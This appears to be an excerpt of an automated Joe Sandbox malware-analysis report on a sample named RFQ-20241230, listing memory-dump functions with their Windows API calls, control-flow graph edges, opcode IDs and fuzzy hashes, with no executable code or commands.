                            • Instruction Fuzzy Hash: 3C41B070C00719DFEB25DFA9C884BDEBBB5BF89704F20846AD408AB251DB756945CF50
                            Function 0137449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 37 137449c-13759d9 CreateActCtxA 40 13759e2-1375a3c 37->40 41 13759db-13759e1 37->41 48 1375a3e-1375a41 40->48 49 1375a4b-1375a4f 40->49 41->40 48->49 50 1375a51-1375a5d 49->50 51 1375a60 49->51 50->51 53 1375a61 51->53 53->53
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 013759C9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1358406786.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: eb5205e6aff2fcfe8b6ad6bb7f182856673e54fef1da1d4a7ced0af5efdbfcf1
                            • Instruction ID: cb44e272526cfa92b94743c75d0179e8bbc158bc70798acdc0d179fae2bde092
                            • Opcode Fuzzy Hash: eb5205e6aff2fcfe8b6ad6bb7f182856673e54fef1da1d4a7ced0af5efdbfcf1
                            • Instruction Fuzzy Hash: 85419FB0C00759CBEB25DFAAC884B9EBBB5BF49704F20846AD408AB251DB756945CF90
                            Function 07622C78 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 54 7622c78-7622c8a 55 7622c92-7622c9d 54->55 56 7622c8d call 76218f8 54->56 57 7622cb2-7622d44 CreateIconFromResourceEx 55->57 58 7622c9f-7622caf 55->58 56->55 62 7622d46-7622d4c 57->62 63 7622d4d-7622d6a 57->63 62->63
                            Memory Dump Source
                            • Source File: 00000000.00000002.1365368010.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7620000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: CreateFromIconResource
                            • String ID:
                            • API String ID: 3668623891-0
                            • Opcode ID: 917848f60ebe7233937050216e6973e36337feb5456bb50dd101d76fa54e3d3e
                            • Instruction ID: 13fc2f842880c46361a6a31407c91538c63bc40170eaada0379cc4f5d3aa94f5
                            • Opcode Fuzzy Hash: 917848f60ebe7233937050216e6973e36337feb5456bb50dd101d76fa54e3d3e
                            • Instruction Fuzzy Hash: 993186B29003599FCB11CFA9D840ADABFF4FF09210F14846AE954A7221C3399856DFA1
                            Function 0137E2C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 66 137e2c8-137e35c DuplicateHandle 67 137e365-137e382 66->67 68 137e35e-137e364 66->68 68->67
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0137E34F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1358406786.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: b4ad9fc7b514c2f8bb80b5b44d874e96d7e30355ad3a126bf3dce76a87d49805
                            • Instruction ID: 78b2cd0d9c6a4b148c16afe6a32e57bd2fd7a2de811ea3e1cceac15e1cabf56e
                            • Opcode Fuzzy Hash: b4ad9fc7b514c2f8bb80b5b44d874e96d7e30355ad3a126bf3dce76a87d49805
                            • Instruction Fuzzy Hash: D721D5B5900249AFDB10CFAAD584ADEFBF4FB48314F14846AE918A3350D378A954CF65
                            Function 076218F8 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 71 76218f8-7622d44 CreateIconFromResourceEx 73 7622d46-7622d4c 71->73 74 7622d4d-7622d6a 71->74 73->74
                            APIs
                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07622C92,?,?,?,?,?), ref: 07622D37
                            Memory Dump Source
                            • Source File: 00000000.00000002.1365368010.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7620000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: CreateFromIconResource
                            • String ID:
                            • API String ID: 3668623891-0
                            • Opcode ID: 9261234116cacb39c00c773b62ed654b13d5dec90d2d6bc088f3df5ac5cb393f
                            • Instruction ID: de90ba73fc9aa44314cc6e8da5d6e3e0bb3c58ea46cdbdd74aedc3deb50ed391
                            • Opcode Fuzzy Hash: 9261234116cacb39c00c773b62ed654b13d5dec90d2d6bc088f3df5ac5cb393f
                            • Instruction Fuzzy Hash: 051126B6800259DFDB10CFAAD844BDEBFF8FB48310F54841AE915A7250C379A951DFA4
                            Function 0137BFE0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 77 137bfe0-137c020 78 137c022-137c025 77->78 79 137c028-137c053 GetModuleHandleW 77->79 78->79 80 137c055-137c05b 79->80 81 137c05c-137c070 79->81 80->81
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0137C046
                            Memory Dump Source
                            • Source File: 00000000.00000002.1358406786.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: 85179db7fa2c19f54e28bf79bd6391cda47086f6c11284b4db8cbeae12e6e3fe
                            • Instruction ID: 712621b73b709353627e88f15d9836b97f648d1feb55fbedee83589616165f1d
                            • Opcode Fuzzy Hash: 85179db7fa2c19f54e28bf79bd6391cda47086f6c11284b4db8cbeae12e6e3fe
                            • Instruction Fuzzy Hash: 681110B6C002498FDB20CF9AD444BDEFBF4AF89214F10842AD928B7610C379A545CFA1
                            Function 095F2598 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 83 95f2598-95f98ea PostMessageW 85 95f98ec-95f98f2 83->85 86 95f98f3-95f9907 83->86 85->86
                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 095F98DD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1367126756.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09530000, based on PE: true
                            • Associated: 00000000.00000002.1366672839.0000000009530000.00000004.08000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_9530000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: 274a828fa7224fe6cd5c7f3eb399f57cbcf378dddbc034da17b1370fd9a270df
                            • Instruction ID: 09ffb37181874f0d9d481e62172e166807dc8f0943c619d0d3e6138d154152b1
                            • Opcode Fuzzy Hash: 274a828fa7224fe6cd5c7f3eb399f57cbcf378dddbc034da17b1370fd9a270df
                            • Instruction Fuzzy Hash: 741100B58007499FDB10DF9AD885BDEFBF8FB48324F10841AEA58A7240D375A944CFA5
                            Function 05BDAE49 Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 167 5bdae49-5bdae84 169 5bdae9c-5bdaea5 167->169 170 5bdae86-5bdae8c 167->170 173 5bdaea7-5bdaeb4 169->173 174 5bdaec3-5bdaedb 169->174 171 5bdae8e 170->171 172 5bdae90-5bdae92 170->172 171->169 172->169 173->174 177 5bdaeb6-5bdaec0 call 5bdac38 173->177 192 5bdaedd call 5bdaf61 174->192 193 5bdaedd call 5bdaf70 174->193 177->174 178 5bdaee3-5bdaee6 180 5bdaf1e-5bdaf4b 178->180 181 5bdaee8-5bdaef6 call 5bdac38 178->181 194 5bdaf4d call 5bdbbe8 180->194 195 5bdaf4d call 5bdbbd7 180->195 181->180 186 5bdaef8-5bdaf1c 181->186 186->180 189 5bdaf53-5bdaf5a 192->178 193->178 194->189 195->189
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID: W
                            • API String ID: 0-655174618
                            • Opcode ID: debfdb7bcda3cf70fb25afbb27260489357413a657e1f962a38ac8de292e930c
                            • Instruction ID: a684c031fd5d45f5e26dbbdf91be6d218ba8af180a91baa6a2ad207daaf65c12
                            • Opcode Fuzzy Hash: debfdb7bcda3cf70fb25afbb27260489357413a657e1f962a38ac8de292e930c
                            • Instruction Fuzzy Hash: FD315A757002159FCB15DF68C884AADBBB2FF89320F244696E525DB2B1D770ED05CBA0
                            Function 05BDF570 Relevance: .6, Instructions: 610COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a121d60c93e6509c85f8733212046649b2e08c85eeb4c3569fe46f9089386462
                            • Instruction ID: 6d253b45c84567b71b01460ba19551f724db1c20379c17cf1cbeb052dfc4f9dd
                            • Opcode Fuzzy Hash: a121d60c93e6509c85f8733212046649b2e08c85eeb4c3569fe46f9089386462
                            • Instruction Fuzzy Hash: 1C22AD35B082058FDB14DB64C854BB9B7F2FF89220F2485AAD407DB2A1EB35EC45CB61
                            Function 05BD6BC3 Relevance: .4, Instructions: 410COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 00ffaa6756b4b32dd22b1a5280eee1f50f55996c7f52d476326982b84631569d
                            • Instruction ID: 5372fe7a3f3aebfa47357cf1a2673e25e9bb383df974ce64012bceaf210edd9d
                            • Opcode Fuzzy Hash: 00ffaa6756b4b32dd22b1a5280eee1f50f55996c7f52d476326982b84631569d
                            • Instruction Fuzzy Hash: 8A02F434600605DFDB48DF68D498AADBBF2FF89211F5581A8E40ADB362DB35EC85CB50
                            Function 05BDAF70 Relevance: .3, Instructions: 332COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0075897e197fd0fefe644fc6577a39dcdde498434b1ec2af2ca526be0a91891a
                            • Instruction ID: 0da0492a9f636efb2dd6bb0694ad268c6ce9dc7020863939d5e72dde9630b7f3
                            • Opcode Fuzzy Hash: 0075897e197fd0fefe644fc6577a39dcdde498434b1ec2af2ca526be0a91891a
                            • Instruction Fuzzy Hash: E2D17F307017058FC728DF75C484AAEB7F6BF85320B5549A9E4529B3A1EB35E846CF20
                            Function 05BD8690 Relevance: .3, Instructions: 297COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 813caca518fe74c431e5a6781fb8a5d83816b1efd9a37dd56128acd6d8ae6306
                            • Instruction ID: 7af15bc7a7ba99598ca577d39da32924894f01097caccb5f370ae00752dee9ab
                            • Opcode Fuzzy Hash: 813caca518fe74c431e5a6781fb8a5d83816b1efd9a37dd56128acd6d8ae6306
                            • Instruction Fuzzy Hash: 56C1F334B00205CFCB58DF68D598AADBBF2BF89711F1545A8E406AB3A1DB35EC41CB60
                            Function 05BDBD11 Relevance: .2, Instructions: 211COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9b17a3030432fda8f16a375b3f66cb15cbccc2c8684c76ce0fa5329257e7bcde
                            • Instruction ID: 2a0ae842becf0b98db9c8b7114b0f9b55d99ca0dbef5276797861f2f66b8161f
                            • Opcode Fuzzy Hash: 9b17a3030432fda8f16a375b3f66cb15cbccc2c8684c76ce0fa5329257e7bcde
                            • Instruction Fuzzy Hash: 8871A2347007058FDB25DB64C884BBAF7A6FF84304F1584AED54A9B2A1DB79A885CF60
                            Function 05BDFCC0 Relevance: .2, Instructions: 206COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 68d02cab212dcc2b7f047638c68aae143aae2e9b277d070ed900c6b67534993a
                            • Instruction ID: 8a107aad7d5d0400bbae88d6282f5048e7e089ace9a9e6e88d658f2fbca471ff
                            • Opcode Fuzzy Hash: 68d02cab212dcc2b7f047638c68aae143aae2e9b277d070ed900c6b67534993a
                            • Instruction Fuzzy Hash: B98123347046058FDB14DF68C894BA9F7B2FF84300F1595A9D846AB366EB34ED45CB60
                            Function 05BD8E30 Relevance: .2, Instructions: 192COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ba5782a5f9e7abf59e02f84004959d6b647aa5f34571d4953f63a086fe31641e
                            • Instruction ID: bbd47c67bcee48a4358b9cd70380cd5af2a3c1467bf70e88daeb76f9bf81b810
                            • Opcode Fuzzy Hash: ba5782a5f9e7abf59e02f84004959d6b647aa5f34571d4953f63a086fe31641e
                            • Instruction Fuzzy Hash: 8551E230B042059FDB18EBB8D0547AEB7B6EF85211B2485ADD00ADB391DB35ED42CBA1
                            Function 05BD9A34 Relevance: .2, Instructions: 174COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ed110a5f4103fde8591d96df28869b406b8ca0f9bcb0bce75e01269bc3ff1c53
                            • Instruction ID: 229ce3a7c9485982d0b33a482d0b877a34fce353c6e587ce7215107a30a1ed18
                            • Opcode Fuzzy Hash: ed110a5f4103fde8591d96df28869b406b8ca0f9bcb0bce75e01269bc3ff1c53
                            • Instruction Fuzzy Hash: 3E6160307007058FDB249B68C848BEAF7E6FF84305F5584A9D14A9B291EF79A885CF60
                            Function 05BDBDA0 Relevance: .2, Instructions: 169COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1f795e7fbab8b27680837d3ca54e243c3a9773a779733402662abce1ffe4f9f3
                            • Instruction ID: c90a430f422fc90192ef914229ba76b26a7b2d0f175d778773fa6048c3d34319
                            • Opcode Fuzzy Hash: 1f795e7fbab8b27680837d3ca54e243c3a9773a779733402662abce1ffe4f9f3
                            • Instruction Fuzzy Hash: 6C6174307007058FDB149B64C848BEAF7E6FF84305F5584AAD15A9B2A1EF75A885CF60
                            Function 05BD8680 Relevance: .2, Instructions: 168COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7076691a2fa3608bdc54370d4c4373181cb5240b6929d71dee0fca10633fe893
                            • Instruction ID: c0d020b413f230a9d5c99e42fe4aed51b34f2c4e63453a5ea156420c68a8fcd5
                            • Opcode Fuzzy Hash: 7076691a2fa3608bdc54370d4c4373181cb5240b6929d71dee0fca10633fe893
                            • Instruction Fuzzy Hash: ED613735A00205CFC754DF68D588AA9B7F2FF49725F2585A8E406EB3A1EB31EC45CB60
                            Function 05BD9CE0 Relevance: .1, Instructions: 147COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: df63672e6b41365a102da1563cdba3e7db89770942566e2e5fa8340c0091fa20
                            • Instruction ID: 93f1e1c2ef796b8d92beb27a937ecf26420eab7898c95ee0c729223924912797
                            • Opcode Fuzzy Hash: df63672e6b41365a102da1563cdba3e7db89770942566e2e5fa8340c0091fa20
                            • Instruction Fuzzy Hash: 835157356002058FDB18DF65C988FA9B7B2FF89714F1481A9E406DB261EB31EC45CBA0
                            Function 05BD9BDC Relevance: .1, Instructions: 137COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ac41957eab1e53c214e7b255b66ce7739f44ca27725449665228b90476187dc2
                            • Instruction ID: b7c2aadc08a2c9b25a96fe78c5a69cc8318e3cbb026434e7d930e7bb6fd34709
                            • Opcode Fuzzy Hash: ac41957eab1e53c214e7b255b66ce7739f44ca27725449665228b90476187dc2
                            • Instruction Fuzzy Hash: 18516C343006059FD714DB28D484A6AB3E6FF84225F1486A9D55ACB360EF71EC46CBA1
                            Function 05BD76C8 Relevance: .1, Instructions: 125COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6f53c92801b32fb48dde58d5942358bd310407e5a732622f1325aa23b0f63388
                            • Instruction ID: 31ea12044281f70db49d3831de2ecb4bcce24e67d6f11ed81b8ba2d3fa3414c4
                            • Opcode Fuzzy Hash: 6f53c92801b32fb48dde58d5942358bd310407e5a732622f1325aa23b0f63388
                            • Instruction Fuzzy Hash: 9F4182347006119FDB659F24C888BB9F3B2FF86310F1449A9D5468B2A1EF75BC46CB61
                            Function 05BD76D8 Relevance: .1, Instructions: 117COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7b020275c2a4850545fd704edb6de7463ba8aa91bb079beeb46510662b1a5d19
                            • Instruction ID: b8b8fbc7c2bc33e616b1676e0b58b99a7f3d2fc7d9426d2deb4b9ad39289223a
                            • Opcode Fuzzy Hash: 7b020275c2a4850545fd704edb6de7463ba8aa91bb079beeb46510662b1a5d19
                            • Instruction Fuzzy Hash: 044152347006119FDB659F24C888BBAF3E6FF85310F5089A9D5468B291EF71BC46CBA1
                            Function 05BD62A8 Relevance: .1, Instructions: 101COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a1fb7c69bd49093cea67b3e0151a6d5765b51ca616586179fbc5f1318f588cf1
                            • Instruction ID: 3a6d3edfc8d7e0293ad42f252598add322311438ea3757077ea992265b933d60
                            • Opcode Fuzzy Hash: a1fb7c69bd49093cea67b3e0151a6d5765b51ca616586179fbc5f1318f588cf1
                            • Instruction Fuzzy Hash: 9F31F8343146018FDB54DB29C8A4F6AB3A6FF88755F1585A9E41ACB361EE34E841CB60
                            Function 05BD8440 Relevance: .1, Instructions: 96COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5605ebef0cf67311655bd44492bbec534df7add820a329ab578c42aa7c6eb1ba
                            • Instruction ID: 6fe7209b90362d3c3534addc4b2128018ed3923c037022d4ecc5c091cf93b9d3
                            • Opcode Fuzzy Hash: 5605ebef0cf67311655bd44492bbec534df7add820a329ab578c42aa7c6eb1ba
                            • Instruction Fuzzy Hash: 373139343046008FD714DB28C854F6AB7A6FF89659F1581E9E45ACB371EA34EC42CB60
                            Function 05BDAE58 Relevance: .1, Instructions: 95COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 62745ef220434148edbbc85bbbc319c3480cb52b5b5692d0fab52022e1ec9f35
                            • Instruction ID: de2025be46d5b496663154b170e4c6b4b64992f78b83d27c9fbbc3de6dd6d734
                            • Opcode Fuzzy Hash: 62745ef220434148edbbc85bbbc319c3480cb52b5b5692d0fab52022e1ec9f35
                            • Instruction Fuzzy Hash: B03119757002159FCB14DF68C884E6DBBB6FF89220F2446A9E525DB2B1DB71ED01CBA0
                            Function 05BD9BAC Relevance: .1, Instructions: 95COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f18419e4bf9569cfd422754f2ac6f7f0d88cad654707af87dad98467f1602479
                            • Instruction ID: b3f909cde34ecb4046ff0cc2880c0dcf2173e84565f248ed60036b49618b70cd
                            • Opcode Fuzzy Hash: f18419e4bf9569cfd422754f2ac6f7f0d88cad654707af87dad98467f1602479
                            • Instruction Fuzzy Hash: A9411675A0021ACFDB04DFA8D884BEDB7B1FF48310F1585A5D559AB3A1DB38A941CFA0
                            Function 05BD8CC0 Relevance: .1, Instructions: 84COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a76b04e04a01fd9b257b0621e4265f79e2ab91f11f9d9f9f9b38761e5014677e
                            • Instruction ID: 68c4aff3da3154e6b8af5bc8d9148512da4900ad3d86bb931b7a6ab6858a18de
                            • Opcode Fuzzy Hash: a76b04e04a01fd9b257b0621e4265f79e2ab91f11f9d9f9f9b38761e5014677e
                            • Instruction Fuzzy Hash: 3E217F303042144B9B196729985963EA7E7EFD565231940ADEA07CB3D4FE34EC02DBB6
                            Function 05BD8985 Relevance: .1, Instructions: 79COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 32894b641eef75762f840f0af396690367d0908a03fe9f6d64f47a22c4deb639
                            • Instruction ID: 77cdaa8ec90a0c8a51a6301fb1bde8986b311b80c2b79fd964d1da34420e1901
                            • Opcode Fuzzy Hash: 32894b641eef75762f840f0af396690367d0908a03fe9f6d64f47a22c4deb639
                            • Instruction Fuzzy Hash: B431D6357002058FCB15DB64C584AADB7F2FF88222F1550A8E946AB3A1EB35ED45CF71
                            Function 05BD8570 Relevance: .1, Instructions: 78COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3ecc2502642328e25a972d0441db5c858b5d54ffa845a93f3ecdcbec623efdfb
                            • Instruction ID: a7765da9b83840da9cbcff458630b56d1faca8f5b76ad06bbf2ef82550c3f1d3
                            • Opcode Fuzzy Hash: 3ecc2502642328e25a972d0441db5c858b5d54ffa845a93f3ecdcbec623efdfb
                            • Instruction Fuzzy Hash: 77312B312106008FC755DB24C898BA6B7E2FF85725F5585A9E08ECB362DF71AC86CB50
                            Function 05BDBBE8 Relevance: .1, Instructions: 76COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 622072685898f1609a5a61333775783d577a2ee6569978846f102491a7077460
                            • Instruction ID: a603b4af2be9556dc1c9bd0c299f29cea158d74f06056b7afab6712f36b4baa8
                            • Opcode Fuzzy Hash: 622072685898f1609a5a61333775783d577a2ee6569978846f102491a7077460
                            • Instruction Fuzzy Hash: EA217F35204749CBCB24DF35C49086BBBF5FF82305B194ABDE4564A290EB35F955CB60
                            Function 012DD4C4 Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1357874954.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_12dd000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d5af1ccf4f76c69eea125ac46dfd457aac153a56c2e610a4033a25a40ad10c35
                            • Instruction ID: 792e692ff36403a14e02ef5256d516bd25e999acdb9c3db2ccd7b002091ad9e1
                            • Opcode Fuzzy Hash: d5af1ccf4f76c69eea125ac46dfd457aac153a56c2e610a4033a25a40ad10c35
                            • Instruction Fuzzy Hash: C9214571510648DFDB11DF94E8C0F26BF65FB88318F24C169E9090B286C336D406CBA2
